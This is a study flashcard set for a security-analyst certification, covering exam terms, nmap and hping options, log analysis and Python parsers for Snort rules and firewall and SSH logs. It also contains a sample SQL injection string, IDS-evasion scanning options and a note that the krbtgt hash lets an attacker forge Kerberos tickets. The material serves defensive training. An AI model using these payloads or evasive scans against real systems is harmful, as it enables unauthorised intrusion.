Key Performance Indicators (KPIs)
a quantifiable measure used to evaluate the success of an organization, employee, or other element in meeting objectives for performance
Penetration Test
a red team attempts to conduct an intrusion of the network using a specific scenario based on threat modeling
Deep Learning
a refinement of machine learning that enables a machine to develop strategies for solving a task given a labeled dataset and without further explicit instructions (uses complex classes of knowledge defined in relation to simpler classes of knowledge to make more informed determinations about an environment)
Indicators of Compromise (IoC)
a residual sign that an asset or network has been successfully attacked or is continuing to be attacked (evidence that an attack was successful)
Common Vulnerability Scoring System (CVSS)
a risk management approach to quantifying vulnerability data and then taking into account the degree of risk to different types of systems or information
Data Steward
a role focused on the quality of the data and associated metadata
Data Custodian
a role responsible for handling the management of the system on which the data assets are stored (e.g., System Administrator)
Privacy Officer
a role responsible for the oversight of any PII/SPI/PHI assets managed by the company
Classification (DLP Discovery and Classification)
a rule based on a confidentiality classification tag or label attached to the data
Compliance Scans
a scan based on a compliance template or checklist to ensure the controls and configuration settings are properly applied to a given target or host (*PCI DSS which requires a quarterly scan*)
Sweep
a scan directed at multiple IP addresses to discover whether a host responds to connection requests for particular ports
Fast/Basic Assessment Scan
a scan that contains options for analyzing hosts for unpatched software vulnerabilities and configuration issues
Service-Oriented Architecture (SOA)
a software architecture where components of the solution are conceived as loosely coupled services not dependent on a single platform type or technology (is an overall design architecture for mapping business workflows to the IT systems that support them)
awk (scripting tools)
a scripting engine geared toward modifying and extracting data from files or data streams in Unix, Linux, and MacOS systems
Bash (scripting tools)
a scripting language and command shell for Unix-like systems that is the default shell for Linux and MacOS
PowerShell (scripting tools)
a scripting language and command shell for Windows
Shodan (shodan.io)
a search engine optimized for identifying vulnerable internet-attached devices
Virtual Private Network (VPN)
a secure tunnel created between two endpoints connected via an unsecure network, usually over the Internet (IPsec, SSH, TLS are all forms of VPNs)
Forward Proxy (CASB)
a security appliance or host positioned at the client network edge that forwards user traffic to the cloud network if the contents of that traffic comply with policy (*WARNING: users may be able to evade the proxy and connect directly*)
Identity and Access Management (IAM)
a security process that provides identification, authentication, and authorization mechanisms for users, computers, and other entities to work with organizational assets like networks, operating systems, and applications
Data Owner
a senior (executive) role with ultimate responsibility for maintaining the CIA of the information asset (is responsible for labeling the asset and ensuring that it is protected with appropriate controls)
Forward Proxy
a server that mediates the communications between a client and another server, can filter or modify communications, and provides caching services to improve performance
Dictionary (DLP Discovery and Classification)
a set of patterns that should be matched
Traffic Spikes
a sharp increase in connection requests in comparison with a given baseline
Indicator of Compromise (IOCs)
a sign that an asset or network has been attacked or is currently under attack
Intrusion Detection System (IDS)
a software and/or hardware system that scans, audits, and monitors the security infrastructure for signs of attacks in progress
Intrusion Prevention System (IPS)
a software and/or hardware system that scans, audits, and monitors the security infrastructure for signs of attacks in progress and can actively block the attacks
Representational State Transfer (REST)
a software architectural style that defines a set of constraints to be used for creating web application services (supports HTTP, XML, CSV, or JSON formatted messages)
Serverless
a software architecture that runs functions within virtualized runtime containers in a cloud rather than on dedicated server instances (depends on orchestration) (everything in serverless is developed as a function or microservice) (eliminates the need to manage physical or virtual servers) (benefits include: no patching, no administration, no file system monitoring) (e.g., Netflix)
Microservices
a software architecture where components of the solution are conceived as highly decoupled services not dependent on a single platform type or technology (is a design paradigm applied to application development)
Amcache
an application usage cache that is stored as a hive file at (C:\Windows\appcompat\Programs\Amcache.hve)
permissions
all types of permissions should be reviewed and reinforced after an incident (change your password)
Multipurpose Internet Mail Extensions (MIME)
allows a body of an email to support different formats, such as HTML, rich text format (RTF), binary data encoded as Base64 ASCII characters, and attachments
airodump-ng
allows us to capture wireless frames that are going across the air, identify information about the wireless access point based on its MAC address, and identify clients based on their MAC address
airmon-ng
allows us to enable/disable monitor mode on our cards
a Memory Analysis tool ...
allows you to reverse engineer the code used by processes, discover how processes interact with the file system (handles) and Registry, examine network connections, retrieve cryptographic keys, and extract strings from the system memory (this can all be done once you have a memory dump)
Port Hopping
an APT's C2 application might use any port to communicate and may jump between different ports
Open Vulnerability and Assessment Language (OVAL)
an XML schema for describing system security state and querying vulnerability reports and information
Extensible Configuration Checklist Description Format (XCCDF)
an XML schema for developing and auditing best-practice configuration checklists and rules
Security Assertions Markup Language (SAML)
an XML-based data format used to exchange authentication information between a client and a service (pairs with the SOAP protocol) (provides SSO and federated identity management)
Jitter (beaconing)
an adversary's use of a random delay to frustrate indicators based on regular connection attempt intervals
Agent-based (Data Normalization)
an agent service is installed on each host to log, filter, aggregate and normalize data on the host before sending it to the SIEM server for analysis and storage
Data Sharing and Use Agreement
an agreement that sets forth the terms under which personal data can be shared or used
Interconnection Security Agreement (ISA)
an agreement used by federal agencies to set out a security risk awareness process and commit the agency and supplier to implementing security controls
Lessons Learned
an analysis of events that can provide insight into how to improve response processes in the future
Hardware Security Module (HSM)
an appliance for generating and storing cryptographic keys that is less susceptible to tampering and insider threats than software-based storage
Reverse Proxy (CASB)
an appliance positioned at the cloud network edge that directs traffic to cloud services if the contents of that traffic comply with policy (*WARNING: this approach can only be used if the cloud application has proxy support*)
Implementation Tiers
assesses how closely core functions are integrated with the organization's overall risk management process and each tier is classed as Partial (low on scale), Risk Informed, Repeatable, and Adaptive (high on scale)
SQL Injection
attack consisting of the insertion or injection of an SQL query via input data from the client to a web application (e.g., ' OR 1=1;)
Fragmentation (hping)
attempts to evade detection by IDS/IPS and firewalls by sending fragmented packets across the network for later reassembly (fragmentation and DoS not likely to be effective against most modern OS and network appliances)
IOC for Data Exfiltration using Explicit Tunnels
atypical endpoints involved in tunnels (VPN/SSH connections) due to their geographic location
IOC for Data Exfiltration using DNS
atypical query types being used, such as TXT, MX, CNAME, and NULL
Spoofing attacks can be mitigated by configuring _________ for email server systems
authentication
Command and control network hosts ...
can be difficult to identify or block since they change DNS names and IP addresses using domain generation algorithms (DGA) and fast flux DNS
Process and Memory Analysis (Virtualization Forensics)
can be performed by VM introspection (VMI) or analyzing save state files
a Registry viewer tool
can extract the Windows Registry files from an image and display them on the analysis workstation
The Microsoft Policy Analyzer ...
can identify whether a policy deviates from a configuration baseline
Disk utilization tools ...
can scan a file system and retrieve comprehensive statistics (e.g., a visual representation of usage, a directory listing, and real-time monitoring of data being written)
Full Packet Capture (FPC)
captures the entire packet including the header and the payload for all traffic entering and leaving a network
classtype (rule options)
categorizes the attack (bruteforce, DoS, etc)
Slashdot Effect (slashdotting)
causing a website to crash when a smaller website becomes popular quickly due to exposure on social sharing sites like Slashdot, Reddit and Twitter
What is one type of DoS attack method?
causing an application to overrun its memory buffer to trigger an execution failure
Atomic Execution
operations that must complete entirely or not at all, without another thread or process interleaving, such as initializing a memory location (helps prevent race conditions such as TOCTTOU)
Digital Rights Management (DRM)
copyright protection technologies for digital media which attempts to mitigate the risk of unauthorized copies being distributed
Analysis (Forensic Procedures)
create a copy of evidence for analysis and use repeatable methods and tools during analysis
Reporting (Forensic Procedures)
create a report of the methods and tools used in investigation and present detailed findings and conclusions based on the analysis
PUT (URL Analysis)
creates or replaces the requested resource
Fieldbus
digital serial data communications used in operational technology networks to link PLCs
BYOD policies complicate ______ _________ since you may not be able to legally search or seize the device
data acquisition
Insecure API (Cloud Threats)
data received by an API must pass server-side validation routines; use proper error handling (sanitize error messages so they do not leak internals); implement throttling/rate-limiting to protect against DoS; and secure your APIs with end-to-end encryption (*WARNING: an API must only be used over an encrypted channel, such as HTTPS*)
The Windows ___ command has some advanced functionality for file system analysis
dir
There are principles of _________ and __________ that govern the exchange of evidence between prosecution and defense in a civil or criminal trial (Work Product Retention)
discovery, disclosure
( ) (regex syntax)
defines a matching group with a regex sequence placed within the parentheses, and then each group can subsequently be referred to by \1 for the first group, \2 for the second, and so on
Detection & Analysis (Incident Response Phases)
determine if an incident has taken place, triage it (categorize it and prioritize it), and notify stakeholders
Scope
different keywords that can be used to select the scope of the search, such as site, filetype, related, allintitle, allinurl, or allinanchor
net start
displays all running services on a computer from the command line
w (new accounts)
displays the same basic information as who, but also returns the remote host (if applicable), how long the account has been idle, the name of processes the account is actively running, the execution time of each process, and more (useful for adversary hunting)
rwho (new accounts)
displays the same basic information as who, but runs on a client/server architecture (useful for adversary hunting)
Request for Change (RFC)
document that lists the reason for a change and the procedures to implement that change
Physical Segmentation
each network segment has its own switch, and only devices connected to that switch can communicate with each other
Cloud Access Security Broker (CASB)
enterprise management software designed to mediate access to cloud services by users across all types of devices (essentially, it is the middle man that helps with authentication and ensures people are using only the services they are allowed to use) (provides visibility into how clients and other network nodes use cloud services) (can be set up as either a forward proxy, reverse proxy, or API)
Frequency-based Analysis
establishes a baseline for a metric and monitors the number of occurrences over time
Fileless Malware
executes from memory without saving anything to the filesystem
Tabletop Exercise (TTX)
discussion-based exercise that walks the team through an incident response scenario against a framework of controls or a red team, without acting on production systems
Write Blockers
forensic tool that prevents the capture or analysis device or workstation from changing data on a target disk or media (hardware write blockers are considered more reliable than software write blockers)
Response Code 502 (URL Analysis)
indicates a bad gateway has occurred when the server is acting as a proxy
Response Code 504 (URL Analysis)
indicates a gateway timeout, meaning the proxy did not get a timely response from the upstream server
Response Code 200 (URL Analysis)
indicates a successful GET or POST request
Response Code 503 (URL Analysis)
indicates an overloading of the server is causing service unavailability
Response Code 404 (URL Analysis)
indicates that a client requested a non-existent resource (very common)
Response Code 400 (URL Analysis)
indicates that a request could not be parsed by the server
Response Code 403 (URL Analysis)
indicates that the server refused the request because the client does not have sufficient permissions (Forbidden); 402 Payment Required is a different, rarely used code
Response Code 401 (URL Analysis)
indicates that a request did not supply authentication credentials
Status Code 450 (SMTP Log Analysis)
indicates that the server can not access the mailbox to deliver the message
Status Code 451 (SMTP Log Analysis)
indicates the local server aborted the action due to a processing error
Status Code 452 (SMTP Log Analysis)
indicates the local server has insufficient storage space available
Status Code 250 (SMTP Log Analysis) *
indicates the message is accepted
Status Code 220 (SMTP Log Analysis) *
indicates the server is ready
Status Code 421 (SMTP Log Analysis)
indicates the service is not available
Response Code 201 (URL Analysis)
indicates where a PUT request has succeeded in creating a resource
Run * (persistence)
its values are launched asynchronously when Windows loads them from the Registry at logon, and they run at every logon
RunOnce * (persistence)
its values are launched in order when Windows loads them from the Registry, and each value is deleted after it has run, so it executes only once
Human-Machine Interface (HMI)
input and output controls on a PLC to allow a user to configure and monitor the system
Server-side code should always utilize _________
input validation
To prevent XML vulnerabilities from being exploited, use proper __________
input validation
To prevent XSS attacks, use proper _________
input validation
Interactive Disassembler (IDA)
is a popular cross-platform disassembler and decompiler used by reverse engineers
Yara rule
is a test for matching certain string combinations within a given data source (binary, log file, packet capture, or email)
# (URL Analysis)
is used to indicate a fragment or anchor ID and is not processed by the webserver
nmap --scan-delay <Time> (Sparse Scanning)
issues probes with significant delays to become stealthier and avoid detection by an IDS or IPS
nmap -Tn (Scan Timing)
issues probes using timing template n, where n ranges from 0 (paranoid, slowest) to 5 (insane, fastest)
Forensic workstations
must have access to a high-capacity disk array subsystem or storage area network (SAN)
Virtual Segmentation *
network segmentation that relies on VLANs to create equivalent segmentation that would occur if you used physical switches
What is the nmap command to perform an intensive port scan? (intensive fingerprint scan)
nmap -sV <IP address> (service/version detection: protocol, application name and version) or nmap -A <IP address> (aggressive scan: adds OS detection, version detection, default script scanning, and traceroute, yielding OS type and version, host name, and device type)
User Interaction (UI) (CVSS)
none (N) or required (R)
Privileges Required (PR) (CVSS)
none (N), low (L), or high (H)
Correlation rules depend on ______ data
normalized
OpenVAS
open source vulnerability scanner that began its development from the Nessus codebase when Nessus was converted to commercial software
General Data Protection Regulation (GDPR)
personal data cannot be collected, processed, or retained without the individual's informed consent (European law that provides stronger protections than the US)
Attack Vector (AV) (CVSS) (called Access Vector in CVSS v2)
physical (P), local (L), adjacent network (A), or network (N)
physical port security
physical access to the switch ports and switch hardware should be restricted to authorized staff (switches should be locked in a network closet/cabinet)
nmap -sn <IP address>
ping scan to identify which hosts are up and which ones are down (first step)
________ is expressed as a percentage
probability
Risk = (Formula)
probability x magnitude
nmap -PS <PortList> (TCP SYN ping)
probes specific ports from the given list using a TCP SYN packet instead of an ICMP packet to conduct the ping (useful because many networks block ICMP packets)
Enumeration
process to identify and scan network ranges and hosts belonging to the target and map out an attack surface (used by both attackers and defenders)
Normalization
process where data is reformatted or restructured to facilitate the scanning and analysis process
Windows Management Instrumentation Command-Line (WMIC- scripting tools)
command-line interface to Windows Management Instrumentation that can query configuration, processes, and event logs on a local or remote Windows machine
Infrastructure as a Service (IaaS)
provides the hardware, operating system, and backend software needed to develop software or services (the consumer is responsible for the security of platforms and applications; the cloud service provider is responsible for the CIA of the hardware in the resource pool; organizational governance is required to control how VMs and containers are provisioned and deprovisioned)
Software as a Service (SaaS)
provides the hardware, operating system, software, and applications needed for a complete application service to be delivered to the end user (the cloud service provider is responsible for the security of the application, platform, and infrastructure; consumers remain responsible for their data, account provisioning, and authorizations)
Committee of Sponsoring Organizations of the Treadway Commission (COSO)
provides guidance on a variety of governance-related topics including fraud, controls, finance, and ethics and relies on COSO's ERM-integrated framework (best practice not a law)
Compensating Control
provides the same (or better) level of protection but uses a different methodology or technology
Platform as a Service (PaaS)
provides your organization with the hardware and software needed for a specific service to operate (consider access control, load balancing, failover, privacy, and protection of data) (always encrypt data stored in a third party solution)
Out-of-band Communication
signals that are sent between two parties or two devices that are sent via a path or method different from that of the primary communication between the two parties or devices
Anti-virus (endpoint protection tool)
software capable of detecting and removing virus infections and (in most cases) other types of malware, such as worms, Trojans, rootkits, adware, spyware, password crackers, network mappers, DoS tools, etc
Data Historian
software that aggregates and catalogs data from multiple sources within an industrial control system (ICS)
Interception Proxy
software that sits between a client and server (MiTM) and allows requests from the client and responses from the server to be analyzed and modified
Decompiler
software that translates a binary or low-level machine language code into higher-level, source-like code (such as C or Java)
Fileless Detection Techniques for Malware
techniques that require analysis of the contents of system memory, and of process behavior, rather than relying on scanning the file system
Website Harvesting
techniques used to copy the source code of website files to analyze for information and vulnerabilities
flags (rule options)
tells us whether to match flags in the packet (such as the TCP SYN, the FIN, the reset, etc)
msg (rule options)
text to inform the responder what triggered the rule (basically a comment)
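Added worked example (not part of the original card set): a parser for the rule options named on the classtype, flags, and msg cards, so an analyst can pull those fields out of a ruleset programmatically during triage. The rule is constructed for the demonstration (a local-range sid, not a rule Snort ships with), and the parser handles keyword:value options only, not valueless ones such as nocase.

```python
import re

# Constructed rule for illustration (added example, not from the page); the sid is
# in the local-rule range and the rule is not one Snort ships with.
SAMPLE_RULE = ('alert tcp any any -> $HOME_NET 23 '
               '(msg:"Telnet SYN to internal host"; flags:S; '
               'classtype:attempted-recon; sid:1000001; rev:1;)')

HEADER_RE = re.compile(
    r"^(?P<action>\w+)\s+(?P<proto>\w+)\s+(?P<src>\S+)\s+(?P<src_port>\S+)\s+"
    r"(?P<direction>->|<>)\s+(?P<dst>\S+)\s+(?P<dst_port>\S+)\s*\((?P<options>.*)\)\s*$")
# keyword:value; pairs, where the value is either a double-quoted string (msg)
# or bare text up to the next semicolon (flags, classtype, sid, rev).
OPTION_RE = re.compile(r'(\w+)\s*:\s*("(?:[^"\\]|\\.)*"|[^;]*);')

def parse_rule(rule):
    """Return the rule header fields plus a dict of its keyword:value options."""
    m = HEADER_RE.match(rule.strip())
    if not m:
        raise ValueError("not a Snort rule")
    parsed = {k: m.group(k) for k in
              ("action", "proto", "src", "src_port", "direction", "dst", "dst_port")}
    parsed["options"] = {key: value.strip().strip('"')
                         for key, value in OPTION_RE.findall(m.group("options"))}
    return parsed

def triage_summary(rule):
    """What a responder wants at a glance: the classtype bucket, the msg text,
    the TCP flag test, and the header's protocol and endpoints."""
    p = parse_rule(rule)
    o = p["options"]
    return "[%s] %s (flags=%s, %s %s:%s -> %s:%s)" % (
        o.get("classtype", "unclassified"), o.get("msg", ""), o.get("flags", "any"),
        p["proto"], p["src"], p["src_port"], p["dst"], p["dst_port"])

if __name__ == "__main__":
    print(triage_summary(SAMPLE_RULE))
```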
Trusted Execution
the CPU's security extensions invoke a TPM and secure boot attestation to ensure that a trusted operating system is running
Which analysis framework provides the most explicit detail regarding how to mitigate or detect a given threat?
the MITRE ATT&CK Framework
| (regex syntax)
the OR logical operator to match conditions as "this or that"
Port Forwarding
the attacker uses a host as a pivot and is then able to access one of its open TCP/IP ports to send traffic from this port to a port of a host on a different subnet
Enterprise Risk Management (ERM)
the comprehensive process of evaluating, measuring, and mitigating the many risks that pervade an organization
Crash Dump (System Memory Image Acquisition)
the contents of memory are written to a dump file when Windows encounters an unrecoverable kernel error
Dynamic Analysis
the execution of a compiled program to analyze the way it runs and interacts with a system or network (e.g., using a debugger, stress testing, or fuzzing)
head syslog.txt
the first 10 lines of the syslog.txt file are displayed
Phishing
the fraudulent practice of sending emails purporting to be from reputable companies in order to induce individuals to reveal personal information, such as passwords and credit card numbers
HTTP Response Codes (URL Analysis)
the status value returned in the response header when a client requests a URL (*don't need to memorize codes for the exam*)
systemd
the init daemon in Linux that is first executed by the kernel during the boot up process and always has the process ID (PID) of 1
tail syslog.txt
the last 10 lines of the syslog.txt file are displayed
Work Recovery Time (WRT)
the length of time in addition to the RTO of individual systems to perform reintegration and testing of a restored or upgraded system following an event
Recovery Time Objective (RTO)
the length of time it takes AFTER an event to resume normal business operations and activities
Evaluate the following log entry:
Jan 11 05:52:56 lx1 kernel: iptables INPUT drop IN=eth0 OUT= MAC=00:15:5d:01:ca:55:00:15:5d:01:ca:ad:08:00 SRC=10.1.0.102 DST=10.1.0.10 LEN=52 TOS=0x00 PREC=0x00 TTL=128 ID=3988 DF PROTO=TCP SPT=2583 DPT=23 WINDOW=64240 RES=0x00 SYN URGP=0
Based on this log entry, which of the following statements is true?
the packet was blocked inbound to the network (INPUT chain, action drop, a TCP SYN from 10.1.0.102 to port 23/telnet on 10.1.0.10 arriving on eth0)
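Added worked example (not part of the original card set): a parser for netfilter log lines like the one in the question, producing the verdict a responder reads off it. The "iptables INPUT drop" prefix is whatever the rule's --log-prefix set, so the prefix regex assumes the page's format and may need adjusting for other hosts.

```python
import re

# Log line taken from the question card above (separator bars removed).  The
# "iptables INPUT drop" text is the rule's --log-prefix; the KEY=VALUE fields
# and bare flag tokens that follow are the kernel's standard netfilter format.
SAMPLE = ("Jan 11 05:52:56 lx1 kernel: iptables INPUT drop IN=eth0 OUT= "
          "MAC=00:15:5d:01:ca:55:00:15:5d:01:ca:ad:08:00 SRC=10.1.0.102 DST=10.1.0.10 "
          "LEN=52 TOS=0x00 PREC=0x00 TTL=128 ID=3988 DF PROTO=TCP SPT=2583 DPT=23 "
          "WINDOW=64240 RES=0x00 SYN URGP=0")

# Assumption: the prefix names the chain and the action, as on the card.
PREFIX_RE = re.compile(r"iptables\s+(?P<chain>INPUT|OUTPUT|FORWARD)\s+(?P<action>\w+)\s+")
TCP_FLAGS = {"SYN", "ACK", "FIN", "RST", "PSH", "URG", "ECE", "CWR"}
DIRECTION = {"INPUT": "inbound", "OUTPUT": "outbound", "FORWARD": "transit"}

def parse_iptables_log(line):
    """Split a netfilter log line into chain, action, KEY=VALUE fields and TCP flags."""
    m = PREFIX_RE.search(line)
    if not m:
        raise ValueError("no iptables prefix found")
    fields, flags = {}, []
    for token in line[m.end():].split():
        if "=" in token:
            key, value = token.split("=", 1)   # OUT= yields an empty value
            fields[key] = value
        else:
            flags.append(token)                # bare tokens: DF (IP), SYN (TCP), ...
    return {"chain": m.group("chain"), "action": m.group("action").lower(),
            "fields": fields, "tcp_flags": [f for f in flags if f in TCP_FLAGS]}

def describe(line):
    """One-line verdict: action, direction, protocol, 4-tuple and TCP flags."""
    p = parse_iptables_log(line)
    f = p["fields"]
    return "%s %s %s %s:%s -> %s:%s flags=%s" % (
        p["action"], DIRECTION[p["chain"]], f.get("PROTO", "?"),
        f.get("SRC", "?"), f.get("SPT", "?"), f.get("DST", "?"), f.get("DPT", "?"),
        ",".join(p["tcp_flags"]) or "-")

if __name__ == "__main__":
    print(describe(SAMPLE))
```

The chain is what settles the direction question: INPUT handles packets addressed to the host itself, OUTPUT those it originates, and FORWARD those it routes between interfaces; a lone SYN to 23/tcp that was dropped on INPUT is an inbound telnet attempt that never reached a service.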
Pre- and Post-admission Control
the points at which client devices are granted or denied access based on their compliance with a health policy: pre-admission checks happen before network access is granted, post-admission checks continue after the device is connected
Time of Check to Time of Use (TOCTTOU)
the vulnerability that occurs when a resource changes between the moment an application checks it and the moment the application uses it (the change invalidates the check that was already made)
Asset Tagging
the practice of assigning an ID to assets to associate them with entries in an inventory database
Steganography
the practice of concealing data within another file, message, image, or video
Privilege Escalation
the practice of exploiting flaws in an operating system or other application to gain a greater level of access than was intended for the user or application (typically follows an initial foothold, such as one gained through a phishing campaign)
GET (URL Analysis)
the principal method used with HTTP and is used to retrieve a resource
Data Sovereignty (Data Policies)
the principle that countries and states may impose individual requirements on data collected or stored within their jurisdiction
Data Minimization (Data Policies)
the principle that only necessary and sufficient personal information may be collected and processed for the stated purpose
Purpose Limitation (Data Policies)
the principle that personal information can be collected and processed only for a stated purpose to which the subject has consented (will restrict your ability to transfer data to third parties)
Remediation
the process and procedures that occur if a device does not meet the minimum security policy
Mobile Device Management (MDM)
the process and supporting technologies for tracking, controlling, and securing the organization's mobile infrastructure
System Hardening
the process by which a host or other device is made more secure through the reduction of that device's attack surface area
Data Exfiltration
the process by which an attacker takes data that is stored inside of a private network and moves it to an external network
Reverse Engineering
the process of analyzing the structure of hardware or software to reveal more about how it functions
Security Regression Testing
the process of checking that updates to code do not compromise existing security functionality or capability (enables identification of security mechanisms that worked before but are now broken after the latest changes)
Trend Analysis
the process of detecting patterns within a dataset over time, and using those patterns to make predictions about future events or better understand past events
Hardware Source Authenticity
the process of ensuring that hardware is procured tamper-free from trustworthy suppliers
Piping (|)
the process of using the output of one command as the input for a second command
Change Management
the process through which changes to the configuration of information systems are monitored and controlled, as part of the organization's overall configuration management efforts (focuses on configuration information, patches installed, backup records, incident reports/issues)
Chain of Custody
the record of evidence history from collection, to presentation in court, to disposal
$ (regex syntax)
the regex will only match at the end of a line when searching
^ (regex syntax)
the regex will only match at the start of a line when searching (anchor/boundary character)
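Added worked example (not part of the original card set) covering the regex cards for ( ), |, $ and ^ together: anchored extraction of sshd authentication events from constructed auth-log lines, with alternation inside a group and numbered groups reused in a replacement. The log lines, hostnames and addresses are made up for the demonstration.

```python
import re

# Constructed auth-log lines (added example, not from the page).
LOG = """\
Jan 11 05:53:01 lx1 sshd[2201]: Failed password for root from 10.1.0.102 port 41022 ssh2
Jan 11 05:53:04 lx1 sshd[2201]: Failed password for invalid user admin from 10.1.0.102 port 41030 ssh2
Jan 11 05:53:09 lx1 sshd[2210]: Accepted password for alice from 10.1.0.20 port 51002 ssh2
Jan 11 05:53:11 lx1 cron[800]: (root) CMD (run-parts /etc/cron.hourly)
"""

# ^ and $ anchor the pattern to the whole line, (Failed|Accepted) is alternation
# inside a capturing group, and the other groups capture timestamp, user and source.
# (?:...) groups only, without capturing, so they do not shift the group numbers.
SSH_RE = re.compile(
    r"^(\w{3} +\d+ [\d:]+) \S+ sshd\[\d+\]: (Failed|Accepted) password for "
    r"(?:invalid user )?(\S+) from (\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2$")

def ssh_auth_events(log_text):
    """Return one dict per sshd password-auth line; non-matching lines are skipped."""
    events = []
    for line in log_text.splitlines():
        m = SSH_RE.match(line)
        if m:
            events.append({"time": m.group(1), "result": m.group(2),
                           "user": m.group(3), "src": m.group(4)})
    return events

def failures_by_source(log_text):
    """Count failed logins per source address, the figure an alert threshold sits on."""
    counts = {}
    for e in ssh_auth_events(log_text):
        if e["result"] == "Failed":
            counts[e["src"]] = counts.get(e["src"], 0) + 1
    return counts

def host_first(line):
    """Groups are referred to by number in the replacement: \\2 \\1 \\3 moves the
    hostname in front of the timestamp, handy before sorting a merged log by host."""
    return re.sub(r"^(\w{3} +\d+ [\d:]+) (\S+) (.*)$", r"\2 \1 \3", line)

if __name__ == "__main__":
    print(failures_by_source(LOG))
    print(host_first(LOG.splitlines()[0]))
```

Without the ^ and $ anchors the same pattern would also match inside a longer line (for example a log line that quotes another log line), which is the usual source of false positives in hand-written grep filters.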
Artificial Intelligence (AI)
the science of creating machines with the ability to develop problem solving and analysis strategies without significant human direction or intervention
krbtgt hash
the trust anchor of the Active Directory domain, which functions like the private key of a root certificate authority: the krbtgt account's key encrypts and signs every ticket-granting ticket (TGT) that users present to access Kerberos services, so anyone holding the hash can forge TGTs
Credentialed Scan (Vulnerability Scanner Types)
the vulnerability scanner is given user accounts to log-on to the target systems or hosts (likely to find vulnerabilities and misconfigurations)
Non-credentialed Scan (Vulnerability Scanner Types)
the vulnerability scanner sends test packets against a target without logging onto the system or host (are more appropriate for external assessment of the network perimeter)
Cellebrite (Mobile Device Forensics)
tool focused on evidence extraction from smartphone and other mobile devices, including older feature phones, and from cloud data and metadata using a universal forensic extraction device (UFED)
crontab (crontab -l)
tool that manages cron jobs, the Linux equivalent of scheduled tasks (on Windows)
Service Analysis Tools for Windows
tools that can help identify suspicious service activity even when anti-malware scanners fail to identify it
Dark Nets
unused physical network ports or unused IP address space within a local network; no legitimate traffic should ever be addressed there, so activity on a dark net is a strong sign of an attacker scanning or a misconfiguration
What is an effective way to synchronize time for our logs in a SIEM?
use Coordinated Universal Time (UTC) (time standard not a time zone)
How do you mitigate against different kinds of Covert Channels?
advanced intrusion detection and user behavior analytics tools are the best option for detecting covert channels, but they will not detect everything
Traceroute (hping)
use arbitrary packet formats, such as probing DNS ports using TCP or UDP, to perform traces when ICMP is blocked on a given network
How do you mitigate rogue devices on your network?
use digital certificates on endpoints and servers to authenticate and encrypt traffic using IPsec or HTTPS, so an unauthenticated device cannot participate
Quotes (" ")
use double quotes to specify an exact phrase and make a search more precise
Social Media Websites (Beaconing)
use of social media platforms' messaging functions allows an attacker to live off the land (attackers don't have to create their own tools; instead they send their messages through the social media APIs, which is harder to detect because the traffic blends in)
What is the best mitigation strategy for data exfiltration?
use strong encryption of data at rest and data in transit
NOT operator
use the minus sign in front of a word or quoted phrase to exclude results that contain that string
AND/OR operator
use these logical operators to require both search items (AND) or to require either search item (OR)
Discovery Scan
used to create and update an inventory of assets by conducting enumeration of the network and its targets without scanning for vulnerabilities (similar to nmap scan) (ping sweep of network)
Timestamping (hping)
used to determine the system's uptime
DELETE (URL Analysis)
used to remove the requested resource
POST (URL Analysis)
used to send data to the server for processing by the requested resource
Framework Profiles
used to supply statements of current cybersecurity outcomes and target cybersecurity outcomes; comparing the current and target profiles shows the gap in cybersecurity capabilities and identifies the investments that will be most productive in closing it (essentially, you look at your organization and capture a baseline of where it stands against the framework right now: low quality or high quality?)
a _______ rootkit might have administrator-level privileges but uses OS features for persistence
user mode
Memorandum of Understanding (MOU)
usually a preliminary or exploratory agreement to express an intent to work together that is not legally binding and does not involve the exchange of money
Query parameters (URL Analysis)
usually formatted as one or more name=value pairs with '&' delimiting each pair
Covert Timing Channel
utilizes one process to alter a system resource so that changes in its response time can signal information to a recipient process
Covert Storage Channel
utilizes one process to write to a storage location and another process to read from that location (because each operation is individually legitimate, the operating system kernel cannot readily detect that the split pair forms a covert channel)
Nikto
vulnerability scanner that can be used to identify known web server vulnerabilities and misconfigurations, identify web applications running on a server, and identify potential known vulnerabilities in those web applications
grep "NetworkManager" /var/log/syslog | cut -d " " -f1-5 | sort -t " " -k3
search /var/log/syslog for lines containing the string "NetworkManager" (each matching line is piped to the next command), keep only the first five space-delimited fields of each line (month, day, time, host, process), and sort the result on the third field (the time)
How do you mitigate against application-based attacks?
web application firewall (WAF)
Vulnerability scans should be performed at least ________
weekly
When does an injection attack occur?
when the attacker inserts malicious code through an application interface
You are a cybersecurity analyst who has been given the output from a system administrator's Linux terminal. Based on the output provided, which of the following statements is correct?
# nmap win2k16.local
Nmap scan report for win2k16 (192.168.2.15)
Host is up (0.132452s latency)
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
# nc win2k16.local 80
220 win2k16.local DionTraining SMTP Server (Postfix/2.4.1)
# nc win2k16.local 22
SSH-2.0-OpenSSH_7.2 Debian-2
your email is running on a non-standard port (nmap labels 80/tcp as http from its port table, but the banner returned on that port is an SMTP 220 greeting from Postfix, not an HTTP response)